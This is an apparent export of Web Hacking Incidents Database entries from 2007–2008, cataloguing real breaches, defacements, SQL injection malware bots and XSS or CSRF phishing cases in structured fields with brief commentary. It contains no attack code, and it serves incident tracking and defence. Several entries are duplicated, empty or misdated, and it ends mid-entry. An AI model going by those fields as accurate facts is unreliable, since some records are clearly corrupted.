Additional Link:
Entry Title: WHID 2008-19: OSU breach raises fears of ID theft
WHID ID: 2008-19
Date Occured: 5/19/2008
Attack Method: Unintentional Information Disclosure
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

At the Oklahoma State Universitiy (OSU) a security breach has exposed the names, addresses and Social Security numbers of 70,000 students, faculty and staff who bought parking and transit services permits in the past six years. The university failed to report the incident to affected individuals for two months after it was detected.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-18: Winzipices SQL bot
WHID ID: 2008-18
Date Occured: 5/11/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

Another member of the wave of SQL injection bots injecting malware inflicting code to web sites.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-17: Hackers' posts on epilepsy forum cause migraines, seizures
WHID ID: 2008-17
Date Occured: 5/11/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Health
Attacked Entity Geography: USA
Incident Description:

Up to now we never registered at WHID an incident that caused physical pain on its victims. Unfortunately, there is always a first. In an attack which gives a whole new dimension to the term "malicious",hackers recently injected to the Epilepsy Foundation's Web site hundreds of pictures and links to pages with rapidly flashing images.

The breach caused severe migraines and near-seizure reactions in some site visitors who viewed the images. People with photosensitive epilepsy can get seizures when they're exposed to flickering images, a response also caused by some video games and cartoons.

The Attack_Method is only described as an exploit of a security hole in the foundation's publishing software. However, the attack looks very much like a variation of the popular iframe injection SQL bots, used for malice rather than profit, hinting that this was an SQL injection attack.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-16: Turkish PM supporters hack hacker's Web site
WHID ID: 2008-16
Date Occured: 5/11/2008
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Politics
Attacked Entity Geography: Turkey
Incident Description:

In a twist on the classical defacement incident, supporters of the Turkish PM defaced, as a retaliation, the web site of hackers who just recently defaced the PM web site. A disturbing question is whether this is a juvenile mischief or was the act planned and executed by PM supporters. Did the political spin reached web site hacking?

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-15: ValueClick to Pay $2.9 Million to Settle FTC Charges
WHID ID: 2008-15
Date Occured: 3/24/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Monetary Loss
Attacked Entity Field: Marketing
Attacked Entity Geography: USA
Incident Description:

In this case SQL injection was not the root cause, but rather the justification. Just as Al Capone was arrested at the end of the day for tax evasion, ValueClick, which seems to infuriate the FTC over many nasty commercial misdeeds, was caught at the end of the day for SQL injection, presumably left open against the company written security policy.

The FTC settlement cost ValueClick a record amount of $2.9 million dollars, plus 20 years of rigorous security procedures that will probably cost as much if not more. On top of that, eBay, a major partner, left ValueClick as a result.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-14: Hacker takes over Dallas police Web site
WHID ID: 2008-14
Date Occured: 2/21/2008
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Security & Law Enforcement
Attacked Entity Geography: USA
Incident Description:

### Dallas say the department shut down its Internet presence after a hacker took over its Web site and filled it with anti-American rants.

The vandalized Web pages included a doctored photograph showing American troops watching over four people lined up against a wall.

Each of the four prisoners had lines leading away from their faces to individual head shots of President George W. Bush, Vice President Dick Cheney, Secretary of State Condoleezza Rice and Sen. John McCain

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-13: Harvard site hacked and leaked on BitTorrent
WHID ID: 2008-13
Date Occured: 2/20/2008
Attack Method: Unknown
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: Joomla
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-12: Greek ministry websites hit by hacker intrusion
WHID ID: 2008-12
Date Occured: 2/17/2008
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Greece
Incident Description:

This is yet another case of defacement of a governmental web site. It is amazing to note it is nearly never the large commercial and financial web sites that are defaced. It is either small mom and dad shops or government and political web sites. Don't you get the feeling the government IT is run like a mom and dad shop? Do you wonder if it is only the IT part that is run that way?

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-11: Hacker breaks into Ecuador's presidential website
WHID ID: 2008-11
Date Occured: 2/12/2008
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: Ecuador
Incident Description:

Was it defaced or not? In this extraordinary incident, a hacker broke to the web site of the Ecuadorian president and said nice things about him. So nice in fact that the presidential office had to apologize in front of the opposition leader. Was it a hack or an over enthusiastic marketing person?

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-10: Chinese hacker steals user information on 18 Million online shoppers at Auction.co.kr
WHID ID: 2008-10
Date Occured: 2/12/2008
Attack Method: Credential/Session Prediction
Application Weakness: Insufficient Entropy
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography: Korea
Incident Description:

Update (January 5th 2009)

We where informed by sources at eBay the Korean sites parent company that the issue was not CRSF or seesion hijacking. The Attack_Method was not disclosed.


A Korean e-commerce site was hacked and a staggering number of record, 18 million, where stolen. In the US this would be front news. We don't know if it was front news in Korea, but did not get to the international media.

The attack description is vague but can be best described as session hijacking.

This incident is a great example of the lack of sufficient international coverage at WHID. Help us by sending us non English incidents! After all, it is not English speakers only that get hacked, but rather us, the WHID maintainers that speak only this language.

More Information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-09: Hacking Stage 6
WHID ID: 2008-09
Date Occured: 2/10/2008
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description:

Sensitive information about people who created an account on the site leaked and was published through IRC.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-08: Hacker steals Davidson Cos. clients' data
WHID ID: 2008-08
Date Occured: 2/4/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Finance
Attacked Entity Geography: USA
Incident Description:

A computer hacker broke into the database of D.A. Davidson, a local Montana financial services firm and stole their entire customers' database: 226,000 records including names and social security numbers. Attack_Method is not known, but it seems very much like a web hack.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-07: Another Free MacWorld Platinum Pass? Yes in 2008!
WHID ID: 2008-07
Date Occured: 1/28/2008
Attack Method: Brute Force
Application Weakness: Application Misconfiguration
Outcome: Monetary Loss
Attacked Entity Field: Technology
Attacked Entity Geography: USA
Incident Description:

Kurt already got his free MacWorld pass last year (WHID 2007-14), but it seems that nothing changes year after year and he was able to pull a similar trick this year. As the codes that allow customers to get the passes where hashed but stored on the client browser, Kurt was able to crack them.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-06: Hackers Take Down Pennsylvania Government
WHID ID: 2008-06
Date Occured: 1/28/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description:

>

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-05: Drive-by Pharming in the Wild
WHID ID: 2008-05
Date Occured: 1/28/2008
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Insufficient Process Validation
Outcome: Phishing
Attacked Entity Field: Finance
Attacked Entity Geography: Mexico
Incident Description:

Symantec reported an active exploit of CSRF against residential ADSL routers in Mexico (WHID 2008-05). An e-mail with a malicious IMG tag was sent to victims. By accessing the image in the mail, the user initiated a router command to changethe DNS entry of a leading Mexican bank, making any subsequent access by a user to the bank go through the attacker's server.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: DSL Router
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-04: RIAA web site cleared
WHID ID: 2008-04
Date Occured: 1/22/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Defacement
Attacked Entity Field: Entertainment
Attacked Entity Geography:
Incident Description:

The web site of RIAA, the Recording Industry Association of America was attacked twice using SQL injection over the weekend. First a query that takes particularly long time was posted on a social network web site causing a distributed denial of service attack against the site. Later on hackers found and abused additional SQL injection and XSS vulnerabilities resulting in major defacement of the site.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-02: Italian Bank's XSS Opportunity Seized by Fraudsters
WHID ID: 2008-02
Date Occured: 1/9/2008
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Phishing
Attacked Entity Field: Finance
Attacked Entity Geography: Italy
Incident Description:

It has been a while since a phishing scam using XSS vulnerability found its way to the Web Hacking Incidents database (SunTrust, WHID 2004-11). The current incident is a good example of what does and does not get into our database: XSS vulnerabilities in public web sites are discovered daily and reported in sites such as XSSed, however most of these vulnerabilities are not included in WHID for lack of public interest. The current incident is different since the vulnerability is known to be exploited by attackers, moving it from the realm of technical interest to the realm of a real problem.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2008-01: Information stolen from geeks.com (Updated)
WHID ID: 2008-01
Date Occured: 1/8/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

Update (Feb 8th 2009) - The company has reached a settlement with the FTC. Not a breathtaking achievement in the effort to make business care about web application security, yet a step in this direction. The report also identifies the attack as an SQL injection attack.


<!--break-->

Very detailed records of geeks.com customers were stolen from the site. The records included name, address, telephone number, e-mail address, credit card number, expiration date, and most notoriously, card verification number (CVV).

The interesting part is that the site had a Hacker Safe seal. The seal was revoked twice last year due to vulnerabilities, but restored after they where patched. It seems that this time the hack preceded the scan or the scan missed the vulnerability. So much for application scanning and vulnerability assessment....

And don't take it lightly as a geeks site. Geeks.com is a $150M/year business.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-89: The big TJX hack
WHID ID: 2007-89
Date Occured: 12/29/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Credit Card Leakage
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

Update (January 12th 2009) An Ukrainian hacker who who was a member of the TJX hack ring was sentenced to 30 years in jail by a Turkish court. According to investigation papers Maksym Yastremskiy made approximately 11 million dollars from the hack!


The TJX breach is one of most publicized hacking incident in recent years. However, until now it was not part of the Web Hacking Incidents Database. And for a good reason: early report described the hack as a war driving hack, in which the attackers drive around and find a wireless network not properly secured.

However new information from the trial of the identity theft ring leader Albert Gonzalez, reveals that in order to penetrate TJX data center from the captured end points, the hackers employed different techniques including password sniffing and SQL injection. The later justifies getting the TJX incident for the 1st time into WHID.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-88: Police Academy in India Hosting a Phishing Site
WHID ID: 2007-88
Date Occured: 9/20/2008
Attack Method: Unknown
Application Weakness:
Outcome:
Attacked Entity Field: Government
Attacked Entity Geography: India
Incident Description:

The SVP National Police Academy in Hyderabad, India has had some sort of compromise on their website resulting in a Bank of America phishing site operating on one of their servers.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-87: Hacker uses Insider information to gain on the stock exhange
WHID ID: 2007-87
Date Occured: 2/21/2008
Attack Method: Unknown
Application Weakness:
Outcome:
Attacked Entity Field: Health
Attacked Entity Geography:
Incident Description:

###

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-87: Hacker uses Insider information to gain on the stock exhange
WHID ID: 2007-87
Date Occured: 2/21/2008
Attack Method:
Application Weakness:
Outcome:
Attacked Entity Field: Health
Attacked Entity Geography:
Incident Description:

###

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Ukrain
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-87: Hacker uses Insider information to gain on the stock exhange
WHID ID: 2007-87
Date Occured: 2/21/2008
Attack Method:
Application Weakness:
Outcome:
Attacked Entity Field: Health
Attacked Entity Geography: USA
Incident Description:

###

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-87: Hacker uses Insider information to gain on the stock exhange
WHID ID: 2007-87
Date Occured: 2/21/2008
Attack Method:
Application Weakness:
Outcome:
Attacked Entity Field: Health
Attacked Entity Geography:
Incident Description:

###

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-87: Hacker uses Insider information to gain on the stock exhange
WHID ID: 2007-87
Date Occured: 2/21/2008
Attack Method:
Application Weakness:
Outcome:
Attacked Entity Field: Health
Attacked Entity Geography:
Incident Description:

###

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-87: Hacker uses Insider information to gain on the stock exhange
WHID ID: 2007-87
Date Occured: 2/21/2008
Attack Method:
Application Weakness:
Outcome:
Attacked Entity Field: Health
Attacked Entity Geography:
Incident Description:

###

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-87: 7-Eleven Hack From Russia Led to ATM Looting in New York
WHID ID: 2007-87
Date Occured: September 2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Monetary Loss
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description: In his most-recent plea agreement, filed in court Monday, confessed hacker Albert Gonzalez admitted conspiring in the 7-Eleven breach and fingered two Russian associates as the direct culprits. The Russians are identified as “Hacker 1″ and “Hacker 2″ in Gonzalez’s plea agreement, and as “Grigg” and “Annex” in an earlier document inadvertently made public by his attorney. The Russians, evidently using an SQL injection vulnerability, “gained unauthorized access to 7-Eleven, Inc.’s servers through 7-Eleven’s public-facing internet site, and then leveraged that access into servers supporting ATM terminals located in 7-Eleven stores,” the plea agreement reads. “This access caused 7-Eleven, Inc., on or about November 9, 2007, to disable its public-facing internet site to disable the unauthorized access.” Read More http://www.wired.com/threatlevel/2009/12/seven-eleven/#ixzz0iehheEY7
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.wired.com/threatlevel/2009/12/seven-eleven/
Attack Source Geography: Russia
Attacked System Technology:
Cost: $2000000
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-86: Mac Blogs defaced using XSS
WHID ID: 2007-86
Date Occured: 2/17/2008
Attack Method: Cross Site Scripting (XSS)
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Technology
Attacked Entity Geography: Global
Incident Description:

The standard disclaimer that we do not cover each and every defacement is relevant to this entry as well. So why do we include the defacement incident this time? First and foremost, it is known to be an XSS abusing a WordPress zero day bug. Secondly, it is a targeted attack aiming to deface only Mac related web sites. Usually targeted defacement attacks are carried out against political targets. Did attacking apple become a political issue? Was Apple transformed into a nation overnight? Well certainly into a cult.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: WordPress
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-85: IndiaTimes.com Visitors Risk High Exposure To Malware
WHID ID: 2007-85
Date Occured: 2/17/2008
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Media
Attacked Entity Geography: India
Incident Description:

The web site of a leading Indian newspaper is swamped with malware. A recent survey by WebSense cites by the Register found that of the sites hosing malware, 51% where legitimate sites that have been broken into. This is a major shift in the threat landscape, since keeping to web sites that you know is no longer a good protection strategy. Anecdotally undermining WebSense own web site classification technology as a security solution.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-84: Soccer league's online shoppers get kicked by security breach
WHID ID: 2007-84
Date Occured: 2/10/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Sports
Attacked Entity Geography: USA
Incident Description:

It is already February, and we still add 2007 incidents. If
you wonder why, it is because organizations such as MLS only now find
out that they were hacked last year! Sometime between January and
August of 2007, names, addresses, credit and debit card data, and
passwords of an unknown number of people, including 169 New Hampshire
residents were stolen from the site.

Why New Hampshire? Because the company has to report to the
authorities there about the incidents, but only specify the number of
individuals from this state affected. Why only New Hampshire? Since
regulations and bills requiring disclosures exist in many states, one
would expect that the company would have to provide such a testimonial
in many states. This incident is another good example of the size of
the hidden part of the iceberg.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-83: More Social Security numbers leaked at Montana State University
WHID ID: 2007-83
Date Occured: 1/28/2008
Attack Method: Administration Error
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

Again a Microsoft Excel file was left on a University's web site for anyone to view.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-82: An SQL injection Mass Robot
WHID ID: 2007-82
Date Occured: 1/8/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field:
Attacked Entity Geography:
Incident Description:

An SQL injection robot is running wild and has already hacked hundreds of thousands of web sites. Since the robot plants malicious code in infected sites, its traces can be found by Googling for a name of Chinese sites referred to in malicious code.

As a security practitioner I often see SQL injection bots, and many times when I install ModSecurity, an open source application firewall but this bot is unique in the way it exploits web sites. It is easier to perform a wide scale attack by exploiting the least common denominator, which in the hacking world is the operating system. As a result most SQL bots tend to try to use SQL injection vectors that will enable issuing OS commands. A good example is a Cacti vulnerability: since it allows an OS command to be issued I often see bots looking for it in the wild. This attack is the first I have seen in which the actual attack vector is SQL based. The bot is modifying every record it has access to into a malicious code in the hope that it will be fetched and displayed by the application to its users.

A byproduct if this vector is that is that results are catastrophic for the site owners. While in a case of common defacement attacks restoring (or recreating) the homepage is all it required to get back to business, in this case the whole database is ruined. Considering the scope of the attack and that restoring the database, if it was ever backup, requires much more expertise, the overall damage of this attack is very high.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: China
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-81: MSNBC Turkish site caught serving malware
WHID ID: 2007-81
Date Occured: 1/1/2008
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Media
Attacked Entity Geography: Turkey
Incident Description:

Another Malware defacement, but this time at a very prominent web site: MSNBC Turkish edition. There are indications that this is an application layer attack.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-80: Vodafone blocks website after hacking
WHID ID: 2007-80
Date Occured: 1/1/2008
Attack Method: Unknown
Application Weakness: Improper Output Handling
Outcome: Defacement
Attacked Entity Field: Service Providers
Attacked Entity Geography: India
Incident Description:

Yet another defacement, but this time at a very major telecommunication provider in India. These are the guys in charge of our network after all!

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-79: Infamous Russian malware gang used SQL injection to penetrate US government sites
WHID ID: 2007-79
Date Occured: 1/1/2008
Attack Method: SQL Injection
Application Weakness:
Outcome:
Attacked Entity Field: Government
Attacked Entity Geography:
Incident Description:

RBN was a big story. It was a hackers group that could work relatively freely in Russia due to rumors connections in high windows. This way it could allow safe hosting for malware. For getting people to the malware they penetrated web sites around the world, and the references article mentioned SQL injection as the method they infiltrated more high profile sites such as US government sites.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Russia
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-78: A Brazilian banking site allows users to views receipts intended for others
WHID ID: 2007-78
Date Occured: 1/1/2008
Attack Method: Forceful Browsing
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field: Finance
Attacked Entity Geography: Brazil
Incident Description:

IDG now reports a bug in the internet banking application of Unibanco, a Brazilian Bank. The vulnerability allowed logged users to view transaction receipts of other unrelated users by changing the "receipt ID" on the form or URL.

Reported by Alexandre Sieira

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-77: HostGator: cPanel Security Hole Exploited in Mass Hack
WHID ID: 2007-77
Date Occured: 1/1/2008
Attack Method: Known Vulnerability
Application Weakness: Application Misconfiguration
Outcome: Planting of Malware
Attacked Entity Field: Service Providers
Attacked Entity Geography: USA
Incident Description:

Hackers exploited an unknown cPanel vulnerability to break into HostGator servers and plant malware on hosted sites.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: cPanel
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-76: A large web hosting firm inflicted by mass malware installation
WHID ID: 2007-76
Date Occured: 1/1/2008
Attack Method: Known Vulnerability
Application Weakness: Application Misconfiguration
Outcome: Planting of Malware
Attacked Entity Field: Service Providers
Attacked Entity Geography: USA
Incident Description:

The Washington Post ran a story about a large scale infiltration to IPower, a major hosting provider. According to the story and the following comments, it seems that the problem is plunging IPower for a long time without being resolved. Put in perspective the PlusNet incident which was serious but swiftly handled and publicly acknowledged by the company.

Actually the problem is so dominant that a recent StopBadware report lists Ipower as by far the most Malware infected hosting company. Reports mention that the problem started as early as mid 2006.

The root cause of the breach here is mentioned as being a vulnerability in either Apache, PHP or cPanel. I have selected the third as being more probably until further evidence materialize.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: cPanel
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-75: PlusNet blames itself for webmail spamfest
WHID ID: 2007-75
Date Occured: 1/1/2008
Attack Method: Misconfiguration
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Service Providers
Attacked Entity Geography: UK
Incident Description:

Misconfiguration of a webmail system at a British hosting provider led to leakage of the entire user's database including all e-mails. The e-mail addresses where actively used for sending spam. Additionally the exploit was used to plant malware on some of the customers' web sites.

This incident is unique since PlusNet has published a very interesting and revealing report about the incident that shed a lot of light on real world state of life application security. A must read.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-74: Web host breach may have exposed passwords for 6,000 clients
WHID ID: 2007-74
Date Occured: 1/1/2008
Attack Method: Known Vulnerability
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Service Providers
Attacked Entity Geography: USA
Incident Description:

A known vulnerability in the helpdesk software used by hosting provider Layered Technologies resulted in leakage of information, including names, addresses, phone numbers and email addresses of up to 6,000 of the company's clients.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: Cerberus Helpdesk
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-73: Brokerage Firm Fined $375,000 for Unsecured Data
WHID ID: 2007-73
Date Occured: 12/26/2007
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: USA
Incident Description: Brokerage firm DA Davidson has agreed to pay a fine of $375,000 for failing to protect confidential client data from Latvian hackers who breached the company in 2007 in an online extortion scheme. The hackers used a SQL injection attack to obtain access to the company’s database on Dec. 25 and 26, 2007.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.wired.com/threatlevel/2010/04/brokerage-firm-fined
Attack Source Geography: Latvia
Attacked System Technology:
Cost: $375000
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-72: David Airey domains hijacked
WHID ID: 2007-72
Date Occured: 12/30/2007
Attack Method: Domain Hijacking
Application Weakness: Insufficient Process Validation
Outcome: Fraud
Attacked Entity Field: Media
Attacked Entity Geography: UK
Incident Description:

Update (Dec 30th 2008)

It seems that the original report was not accurate and it was not a CSRF vulnerablity that was exploited. The mistake is reported by the victim in an imaginary discussion with Google blog post (Search the page for XSRF) and by Google. Google hints that it was a phishing attack, but David Airey is not convinced.


Many times we dismiss seemingly minor vulnerabilities in major web sites. Most notably, "yet another" XSS or CSRF vulnerability in a well known service is not considered news anymore. However the following story proves that no matter what, such vulnerabilities cannot be ignored.

The attack is simple, the result pretty frightening. An attacker, presumably Iranian, stole the domain name of David Airey, a graphic artist and a known blogger. The attack was very well timed with David's leaving to a long vacation. The goal was to extort money in order to return the domain. In David's case there is a happy end, as the attention he got helped him receive his blog back, with some loss in traffic, search engine ranking and time. But other victims of the attacker who steal domains for living may not be as fortunate.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Iran
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-71: Hacker uses Social Security numbers from Ohio court site
WHID ID: 2007-71
Date Occured: 12/22/2007
Attack Method: Predictable Resource Location
Application Weakness: Insufficient Authorization
Outcome: Leakage of Information
Attacked Entity Field: Security & Law Enforcement
Attacked Entity Geography: USA
Incident Description:

The Secret Service has arrested at least 6 people in an investigation that involves information theft at an Ohio court web site, which is actively used for identity theft. At least one known identity theft case resulted in $40,000 loss to the victim.

The sensitive information was stolen by manipulating predictable identifier parameters. The stolen information belong to at least 270 people and includes the name, address, age and other information could be used to obtain credit cards and open bank accounts.

Additional information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2007-70: Tucson, Arizona police web site defaced using SQL injection
WHID ID: 2007-70
Date Occured: 12/20/2007
Attack Method: SQL Injection
